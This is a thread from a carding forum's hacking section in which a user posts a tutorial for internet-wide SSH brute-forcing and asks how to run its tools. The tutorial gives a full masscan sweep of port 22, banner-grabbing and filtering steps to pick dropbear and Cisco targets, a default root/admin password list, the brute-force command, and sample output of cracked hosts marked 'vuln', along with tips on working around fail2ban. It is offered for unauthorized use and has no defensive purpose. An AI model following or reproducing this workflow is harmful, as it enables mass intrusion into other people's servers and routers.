Go Back   Carder.life > [en] International Forum > Hacking & Coding



 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
  #1  
Old 03-04-2025, 11:48 AM

Kot1 Kot1 is offline
Join Date: Mar 2021
Posts: 0
Default


Hi
just wanted to ask if you can help me i got a tut for ssh cracking
But can seen to understand which command to press step by step
the way this tool works
This is how the tool works
1 scan for open 22 ip
2 you have to scan the ip for servers banners
3 then you start the cracking
to get ip i use this
./masscan $1 -p22 -oL input.txt --max-rate $masscan_speed --open --banners --exclude 255.255.255.255 --exclude 10.0.0.0/8 --exclude 192.168.0.0/16 --exclude 127.0.0.0/8 -sS -Pn -n --randomize-hosts -v --send-eth
./ss 22 -a 110 eth0 -s 10
That part i understand
Theres two part im not understanding is commands for ./ssh2banner and ./bssh2z this is what im not sure is (./ssh2banner <VIPCODE>) and for (./bssh2z YOUR_VIPCODE_PASSWORD i google it and cant find anything
./ssh2banner <FORKS> <PORT> <TIMEOUT> <VIPCODE>
./ssh2banner 150 22 10
./bssh2z <FORKS> <PORT> <TIMEOUT> <VIPCODE>
./bssh2z 150 22 10 YOUR_VIPCODE_PASSWORD;
ICQ 680864860
Thats the tut
************************************************** ************************************************** *******************************************
INFO.TXT
1. ssh2banner is for retriving the banner of the ssh server. The good thing is that you don't even need u/p, thus making this a very good tool of determining if is a proper ssh server
INPUT FILE = `i`
1.2.3.4
3.3.3.3
4.4.4.4
OUTPUT
1.2.3.4:22:SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu
3.3.3.3:22:SSH-2.0-OpenSSH_3.7.1p2
4.4.4.4:22:SSH-WHATEVER_BANNER
EXAMPLE RUN
./ssh2banner <FORKS> <PORT> <TIMEOUT> <VIPCODE>
So we have the bios.txt that containts a list of ips that have port 22 opened it is time to put it to the check with ssh2banner.
(banner ssh will read `i` file, also shuffeling ips)
cat bios.txt | sort -u | shuf > i
./ssh2banner 150 22 10 YOUR_VIPCODE_PASSWORD;
We will use 150 forks (max ssh connection at a time), but you can put whatever number you want(500,1000), be carefull to not get your server banned or in ram/cpu load.
The ssh2banner is way faster then the bssh2z (brute-ssh) because it is just connecting to the server and getting the ssh-banner only without username/passowrd. It will generate an `banners.log` file that will contain data like this :
1.2.3.4:22:SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu
3.3.3.3:22:SSH-2.0-OpenSSH_3.7.1p2
4.4.4.4:22:SSH-WHATEVER_BANNER
You will see a lot of banners, starting from OpenSSH to dropbear or some that you even heared about, like routers and other stuff. This list is perfect to do a brute-SSH attack on it, thus you are 100% that those are servers and not some other applications that are opened on port 22.
Retrieve just the ips from this list with this command :
rm i;
cat banners.log | cut -f ":" -f 1 > i;
if you wish you can scan only dropbear
cat banners.log | grep "dropbear" | cut -f ":" -f 1 > i;
or cisco routers
cat banners.log | grep "cisco" | cut -f ":" -f 1 > i;
Create a nice password file `p` begining with the user/pass combo "root $BLANKPASS", should look like this :
root $BLANKPASS
admin admin
username password
...
then do a
wc -l i p
233214 i
18 p
233232 total
Looks ok
2. bssh2z (brute ssh) is for brute-forcing list of ips with various passwords
INPUT FILE (list of ips) = `i`
1.2.3.4
3.3.3.3
4.4.4.4
INPUT FILE (list of user/pass combo) = `p`
root $BLANKPASS
admin admin
user pass
OUTPUT
`n` -> nobash,busybox,honeypot,other linux
root:r0ot:1.2.3.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
root:r0ot:4.4.4.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
root:r0ot:5.5.5.5:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51
root:r0ot:6.6.6.6:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.5
`v` -> vuln,virtual,good linux
root::7.7.7.7:22:Linux:SSH-2.0-OpenSSH_6.6:Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz:3764 2558 1206 0 166 336:vuln
user:live:8.8.8.8:22:Linux:SSH-2.0-OpenSSH_6.0p1 Debian-4:Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz:6040 1307 4732 0 135 633:vuln
root::9.9.9.9:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 179 0 0 14317:vuln
root::10.10.10.10:22:Linux:SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2:ARMv7 Processor rev 2 (v7l):492 281 210 12 47 109:vuln
root::11.11.11.11:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 178 0 0 14317:vuln
EXAMPLE RUN
./bssh2z <FORKS> <PORT> <TIMEOUT> <VIPCODE>
If you put like 20 ips and 400 passwords and the scan works slow, don't worry, it is a fail2ban protection. It is pointless to finish them in 1 minute, thus you will get banned after the first 5 tries in less then a minute. It will finish it, have patience.
Now we will do a brute-SSH attack on those using this command
./bssh2z 150 22 10 YOUR_VIPCODE_PASSWORD;
You will see something like this going on:
Current version : 2.5.1
Last version : 2.4.1
Counting PASS
Counted [18] PASS
Counting IPS
Counted [233214] IPS
There are [4197852] possible combinations
Starting session 0
Trying user/pass combo #1->[guest][]
Combo [9 of 4197852] -> [178.27.29.115] with [guest][]
Combo [4 of 4197852] -> [220.128.68.129] with [guest][]
...
Duplicate NOBASH [128.54.202.72]
Duplicate NOBASH [37.48.86.100]
Combo [53262 of 4197852] -> [67.221.173.53] with [guest][]
....
************************************************** ************************************************** *******************************************
 

Tags
NULL

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is On

Forum Jump




All times are GMT. The time now is 08:22 PM.